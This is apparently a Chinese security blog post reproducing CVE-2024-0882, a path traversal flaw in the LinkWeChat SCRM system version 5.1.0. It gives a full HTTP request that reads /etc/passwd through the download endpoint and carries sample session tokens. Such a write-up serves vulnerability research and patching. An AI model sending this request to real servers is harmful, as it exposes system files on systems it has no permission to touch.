本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
LinkWeChat 是基于企业微信的开源 SCRM 系统,是企业私域流量管理与营销的综合解决方案。
LinkWeChat 基于企业微信开放能力,不仅集成了企微强大的后台管理及基础的客户管理功能,而且提供了多种渠道、多个方式连接微信客户。并通过客情维系、聊天增强等灵活高效的客户运营模块,让客户与企业之间建立强链接,从而进一步通过多元化的营销工具,帮助企业提高客户运营效率,强化营销能力,拓展盈利空间。
主要运用于电商、零售、教育、金融、政务等服务行业领域。
开发语言:Java
官网地址:https:
//www.linkwechat.net/
项目地址:https:
//github.com/qwdigital/LinkWechat-Scrm
空间测绘
回复“CVE-2024-0882”获取空间测绘语句
漏洞描述
qwdigital LinkWechat 5.1.0 中发现漏洞。它已被归类为有问题的。这会影响组件通用下载接口的文件 /linkwechat-api/common/download/resource 的未知部分。使用输入 /profile/../../../../../etc/passwd 操作参数名称会导致路径遍历,可以远程发起攻击。
影响版本
qwdigital LinkWechat 5.1.0
漏洞利用
需要登录任一用户
GET
/linkwechat-api/common/download/resource?name=/profile/../../../../../etc/passwd
HTTP/1.1
Host
: xxx.xxx.xxx
Connection
: close
sec-ch-ua
: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
sec-ch-ua-mobile
: ?0
sec-ch-ua-platform
: "Windows"
Upgrade-Insecure-Requests
: 1
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site
: none
Sec-Fetch-Mode
: navigate
Sec-Fetch-Dest
: document
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
Cookie
: Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJ1c2VyX3R5cGUiOiIwMyIsInVzZXJfaWQiOjE2OCwibG9naW5fdHlwZSI6IkxpbmtXZUNoYXRBUEkiLCJ1c2VyX25hbWUiOiJsdyIsInVzZXJfa2V5IjoiNGI4NmUzM2QtZmYyNC00YWNjLTkwMzEtMDhlZTQ3YWI3NmFkIiwiY29ycF9uYW1lIjoi5Luf5b6u56eR5oqAIiwiY29ycF9pZCI6Ind3NjIyZmM4NTJmNzljM2YxMyJ9.ZYXfC0WL_RTueRE4qQVEO4C_3lF97_iUcgDbBx_muI8ev2ZA5DO7DSNFzXIky77lDKhjRs0grtEhR78v-Hhc8A
authorization
: Bearer eyJhbGciOiJIUzUxMiJ9.eyJ1c2VyX3R5cGUiOiIwMyIsInVzZXJfaWQiOjE2OCwibG9naW5fdHlwZSI6IkxpbmtXZUNoYXRBUEkiLCJ1c2VyX25hbWUiOiJsdyIsInVzZXJfa2V5IjoiNGI4NmUzM2QtZmYyNC00YWNjLTkwMzEtMDhlZTQ3YWI3NmFkIiwiY29ycF9uYW1lIjoi5Luf5b6u56eR5oqAIiwiY29ycF9pZCI6Ind3NjIyZmM4NTJmNzljM2YxMyJ9.ZYXfC0WL_RTueRE4qQVEO4C_3lF97_iUcgDbBx_muI8ev2ZA5DO7DSNFzXIky77lDKhjRs0grtEhR78v-Hhc8A
sec-fetch-user
: ?1
参考链接
https:
/
/nvd.nist.gov/vuln
/detail/
CVE-
2024
-0882
https:
/
/github.com/biantaibao
/LinkWechat-Scrm_arbitrary-file-download-vulnerability/blob
/main/report
.md
原文始发于微信公众号(不够安全):[漏洞复现] CVE-2024-0882 LinkWechat-Scrm 任意文件读取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论